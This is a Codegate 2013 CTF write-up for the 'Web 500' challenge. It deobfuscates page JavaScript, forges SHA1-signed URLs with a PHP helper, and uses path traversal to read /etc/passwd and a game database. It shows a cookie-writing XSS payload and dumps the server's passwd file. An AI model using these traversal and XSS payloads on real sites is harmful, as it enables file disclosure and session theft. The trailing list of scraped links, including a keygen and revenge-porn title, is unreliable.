Web 500

It was such a fantastic challenge and I’ve been absorbed in it. Once you enter the challenge, a message appears that you have to visit this web site by mobile only, so I installed Mozila user-agent switcher for more comfort. I visited site with fake user-agent and I found something interesting:

http://58.229.122.16:33445/site/main.js
var _0x5291=["\x3D\x73\x54\x4B\x70\x55\x47\x63\x68\x4E\x32\x63\x6C\x39\x46\x4B\x6C\x42\x58\x59\x6A\x4E\x58\x5A\x75\x56\x48\x4B\x6C\x52\x58\x61\x79\x64\x6E\x4C\x30\x35\x57\x5A\x74\x56\x33\x59\x76\x52\x32\x4F\x70\x6B\x55\x53\x77\x38\x46\x4B\x6B\x78\x57\x61\x6F\x4E\x45\x5A\x75\x56\x47\x63\x77\x46\x6D\x4C\x77\x77\x57\x4D\x66\x70\x77\x4F\x64\x42\x7A\x57\x70\x63\x43\x5A\x68\x56\x47\x61\x6E\x67\x53\x5A\x74\x46\x6D\x54\x6E\x46\x47\x56\x35\x4A\x30\x63\x30\x35\x57\x5A\x74\x56\x47\x62\x46\x52\x58\x5A\x6E\x35\x43\x64\x75\x56\x57\x62\x31\x4E\x32\x62\x6B\x42\x53\x50\x67\x41\x44\x62\x78\x38\x46\x49\x79\x46\x6D\x64\x4B\x73\x54\x4B\x4D\x4A\x56\x56\x75\x51\x6E\x62\x6C\x31\x57\x64\x6A\x39\x47\x5A\x6F\x51\x6E\x62\x6C\x35\x32\x62\x77\x31\x32\x62\x44\x6C\x6B\x55\x56\x56\x47\x5A\x76\x4E\x6D\x62\x6C\x74\x79\x4A\x39\x77\x6D\x63\x31\x5A\x79\x4A\x72\x6B\x69\x63\x6C\x4A\x6E\x63\x6C\x5A\x57\x5A\x79\x35\x43\x64\x75\x56\x57\x62\x31\x4E\x32\x62\x6B\x68\x43\x64\x75\x56\x6D\x62\x76\x42\x58\x62\x76\x4E\x55\x53\x53\x56\x56\x5A\x6B\x39\x32\x59\x75\x56\x32\x4B\x6E\x30\x6A\x5A\x6C\x4A\x6E\x4A\x6E\x73\x79\x4A\x72\x39\x57\x50\x6A\x4A\x33\x63\x30\x56\x32\x5A\x2F\x38\x53\x62\x76\x4E\x6D\x4C\x30\x42\x58\x61\x79\x4E\x32\x63\x68\x5A\x58\x59\x71\x4A\x33\x62\x30\x46\x32\x59\x7A\x56\x6E\x5A\x69\x39\x6D\x4C\x70\x42\x58\x59\x76\x38\x69\x4F\x77\x52\x48\x64\x6F\x64\x43\x49\x39\x41\x79\x59\x79\x4E\x6E\x4C\x4A\x6C\x45\x4D\x66\x70\x77\x4F\x70\x63\x43\x64\x77\x6C\x6D\x63\x6A\x4E\x33\x4A\x6F\x51\x6E\x62\x6C\x31\x57\x5A\x73\x56\x55\x5A\x30\x46\x57\x5A\x79\x4E\x6D\x4C\x30\x35\x57\x5A\x74\x56\x33\x59\x76\x52\x47\x49\x39\x41\x53\x53\x4A\x42\x7A\x58\x67\x49\x58\x59\x32\x74\x7A\x4A\x46\x4E\x54\x4A\x30\x42\x58\x61\x79\x4E\x32\x63\x76\x4D\x30\x4D\x6C\x51\x30\x4E\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x6B\x6A\x4D\x6C\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x73\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6B\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x49\x54\x4A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6F\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x41\x6A\x4D\x6C\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x49\x54\x4A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6A\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x51\x79\x49\x54\x4A\x72\x55\x32\x5A\x68\x42\x48\x4F\x79\x55\x53\x4D\x42\x68\x30\x55\x6A\x78\x57\x59\x6A\x74\x69\x4D\x79\x55\x43\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x7A\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x4E\x79\x55\x69\x4D\x79\x55\x79\x4B\x6C\x64\x57\x59\x77\x74\x69\x4D\x79\x55\x43\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x41\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x65\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6B\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x43\x52\x7A\x55\x69\x5A\x6C\x4A\x48\x61\x75\x34\x32\x62\x70\x52\x58\x59\x6A\x39\x47\x62\x75\x63\x33\x62\x6B\x35\x57\x61\x33\x6C\x44\x4D\x6C\x45\x45\x4D\x6C\x51\x30\x4E\x6C\x6B\x44\x4D\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x73\x57\x59\x6C\x4A\x6E\x59\x77\x49\x54\x4A\x43\x4E\x54\x4A\x79\x49\x54\x4A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x77\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x74\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x5A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x45\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x58\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x51\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x5A\x79\x49\x54\x4A\x45\x4E\x54\x4A\x6C\x64\x57\x59\x77\x42\x6A\x4D\x6C\x45\x30\x4D\x6C\x41\x6A\x4D\x6C\x4D\x44\x4D\x79\x55\x53\x5A\x7A\x46\x32\x59\x35\x41\x54\x4A\x35\x41\x54\x4A\x42\x42\x54\x4A\x43\x4E\x54\x4A\x72\x46\x57\x5A\x79\x4A\x47\x4D\x79\x55\x69\x51\x7A\x55\x69\x4D\x79\x55\x43\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x34\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x59\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6B\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x49\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x43\x52\x7A\x55\x53\x5A\x6E\x46\x47\x63\x77\x49\x54\x4A\x42\x4E\x54\x4A\x77\x49\x54\x4A\x79\x41\x6A\x4D\x6C\x55\x32\x63\x68\x4E\x57\x4F\x77\x55\x53\x4F\x77\x55\x53\x51\x77\x55\x69\x51\x7A\x55\x79\x61\x68\x56\x6D\x63\x69\x42\x6A\x4D\x6C\x49\x30\x4D\x6C\x49\x6A\x4D\x6C\x77\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x74\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x5A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x76\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x45\x4E\x54\x4A\x6C\x64\x57\x59\x77\x42\x6A\x4D\x6C\x45\x30\x4D\x6C\x41\x6A\x4D\x6C\x45\x44\x4D\x79\x55\x53\x5A\x7A\x46\x32\x59\x35\x41\x54\x4A\x35\x41\x54\x4A\x42\x42\x54\x4A\x43\x64\x54\x4A\x77\x49\x54\x4A\x35\x49\x54\x4A\x77\x68\x6A\x4D\x6C\x41\x6A\x4D\x6C\x67\x32\x59\x30\x6C\x32\x64\x7A\x6C\x44\x4D\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x49\x6A\x4D\x6C\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x34\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x38\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6F\x4A\x6A\x4D\x6C\x41\x6A\x4D\x6C\x51\x30\x4D\x6C\x41\x6A\x4D\x6C\x55\x32\x5A\x68\x42\x48\x4D\x79\x55\x69\x63\x68\x5A\x58\x4F\x77\x55\x53\x51\x77\x55\x69\x51\x33\x55\x53\x4F\x79\x55\x43\x63\x34\x49\x54\x4A\x6C\x64\x57\x59\x77\x39\x46\x5A\x68\x39\x47\x62\x77\x49\x54\x4A\x75\x39\x57\x61\x30\x4E\x6D\x62\x31\x5A\x57\x52\x7A\x55\x43\x64\x77\x6C\x6D\x63\x6A\x4E\x33\x51\x7A\x55\x79\x4A\x39\x55\x47\x63\x68\x4E\x32\x63\x6C\x39\x46\x49\x79\x46\x6D\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];var lO1=_0x5291[0];var _0x84de=[_0x5291[1],_0x5291[2],_0x5291[3],_0x5291[4],_0x5291[5],_0x5291[6]];function OO1(_0xc565x4){var _0xc565x5=_0x84de[0];var _0xc565x6,_0xc565x7,_0xc565x8,_0xc565x9,_0xc565xa,_0xc565xb,_0xc565xc,_0xc565xd,_0xc565xe=0,_0xc565xf=_0x84de[1];do{_0xc565x9=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xa=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xb=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xc=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xd=_0xc565x9<<18|_0xc565xa<<12|_0xc565xb<<6|_0xc565xc;_0xc565x6=_0xc565xd>>16&0xff;_0xc565x7=_0xc565xd>>8&0xff;_0xc565x8=_0xc565xd&0xff;if(_0xc565xb==64){_0xc565xf+=String[_0x84de[4]](_0xc565x6);} else {if(_0xc565xc==64){_0xc565xf+=String[_0x84de[4]](_0xc565x6,_0xc565x7);} else {_0xc565xf+=String[_0x84de[4]](_0xc565x6,_0xc565x7,_0xc565x8);} ;} ;} while(_0xc565xe<_0xc565x4[_0x84de[5]]);;return _0xc565xf;} ;function _0OO(_0xc565x11){var _0xc565x12=_0x84de[1],_0xc565xe=0;for(_0xc565xe=_0xc565x11[_0x84de[5]]-1;_0xc565xe>=0;_0xc565xe--){_0xc565x12+=_0xc565x11[_0x84de[2]](_0xc565xe);} ;return _0xc565x12;} ;eval(OO1(_0OO(lO1)));

It was obfuscated, I easily turned it into clear text:

// Unpacker warning: be careful when using myobfuscate.com for your projects:
// scripts obfuscated by the free online version may call back home.
//
function load_page(p) {
    var page = "h" + "o" + "m" + "e" + "." + "h" + "t" + "m" + "l" + "";
    switch (p) {
        case 1:
            page = "h" + "o" + "m" + "e" + "." + "h" + "t" + "m" + "l";
            break;
        case 2:
            page = "i" + "n" + "t" + "r" + "o" + "d" + "u" + "c" + "e" + "." + "h" + "t" + "m" + "l";
            break;
        case 3:
            page = "g" + "e" + "t" + "_" + "t" + "a" + "g" + "." + "h" + "t" + "m" + "l" + "";
            break;
    }
    window.location.href = "i" + "n" + "d" + "e" + "x" + "." + "p" + "h" + "p" + "?" + "p" + "=" + page + "&" + "s" + "=" + calcSHA1(page + "A" + "c" + "e" + " " + "i" + "n" + " " + "t" + "h" + "e" + " " + "H" + "o" + "l" + "e");
}

In the last line you would realize the algorithm of the URL [p= + str + & s= + sha1($str.'Ace in the Hole')]; The structure of URLs were something like following pattern:

http://58.229.122.16:33445/site/index.php?p=[page]&s=[hash]

I coded a PHP script making any optional page by given algorithm:

<?php
echo "\n";
$str = $argv[1];
echo "Simple SHA1 creator, URL:\n\n";
echo "http://58.229.122.16:33445/site/index.php?p=".$str."&s=".sha1($str.'Ace in the Hole');
echo "\n";
?>

I created following links to see the source files:

index.php:
/site/index.php?p=index.php&s=b7fdc6dd3dd295755f8f3d95cd3e2d7ae93db333

simulator.php:
/site/index.php?p=simulator.php&s=f1276925f4cd545e6d260fecae13a49bad0d44ca

simulator_ok.php:
/site/index.php?p=simulator_ok.php&s=7380158ad4653ae13076cabbffd99f81985062c4

Passwd:
/site/index.php?p=../../../../../../../etc/passwd&s=05d0d30187b2b3bc815896a69669f5a09e99e4af

Issue:
/site/index.php?p=../../../../../../../etc/apache2/apache.conf&s=8f5eb80a435581528c1377e7fb406b9875be3c29

simulator_ok.php was much important among them. I read it:

$db = sqlite_open("/var/game_db/gamesim_".$_SESSION['scrap'].".db");

And it gave me the database’s path, and from simulator.php I got how the $_SESSION was filled:

if (isset($_POST['name'])) $_SESSION['scrap']=$_POST['name'];

I registered a character with name “test” and I read:

/index.php?p=../../../../../../../var/game_db/gamesim_test.db&s=5ba96b8bc3bcf78fad0e24286f15606235a0adaf

And it led me to gain the flag! I also found a usefulness XSS:

POST /site/simulator.php HTTP/1.1
Host: 58.229.122.16:33445
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://58.229.122.16:33445/site/index.php?p=get_tag.html&s=cc8781cbe7cc10799a1de386aea7344216b39ca4
Cookie: PHPSESSID=cmlmesbsf4nem7rriqvrpcmlq5
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

name="><script>document.write(document.cookie)</script>

And the passwd of server:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
blueh4g:x:1000:1000:blueh4g,,,:/home/blueh4g:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

Which took my time nearly half on our (to find out another paths), be safe!

Codegate 2013 CTF write-up, web500

Web 500

Trending Articles

Practice Sheet of Right form of verbs for HSC Students

Download: FK ft Shenky – Nakuyewa ”Prod by: Shenky”

How to win at Markstrat (Markstrat Tips and Tricks) – Vodites

Ominde Commission Report and Recommendations – Ominde Report of 1964

Bureau of Internal Revenue: Regional Offices (Directory)

GO 53 on Enhancement of Ex-gratia upto 5 Lakhs Toddy Tappers in Telangana

Cakewalk CA-2A Leveling Amplifier v2.0.1.97 WiN, v2.0.1.96 OSX Incl Keygen

Mp3 Download: Mdu - Kunjenjenjena

How the kill the job , when DTP request running for long hours.

Microsoft Intune から展開しているアプリのアップデートについて

18-year-old girl was beaten for half an hour by two Northampton men in 'an...

Car crash in Dunton Bassett leaves driver in critical condition

Macky 2, Two Others In Road Accident

Application log 00000000000000089514: Could not convert queue DLVST90CLNT

Detroit mafia: D’Anna Brothers agree to plea deal

Delivery block field greyed out using VA02

Muloraki Au

【個人撮影】スマホのプライベート映像♪「中に出さないで///」カラオケ屋での生ハメ撮りが流出ｗ【リベンジポルノ】＠PornHub

BREAKING NEWS: Diamond Platnumz Is Reported Dead After Ghastly Car Accident

FIAT 500 B0111 B0112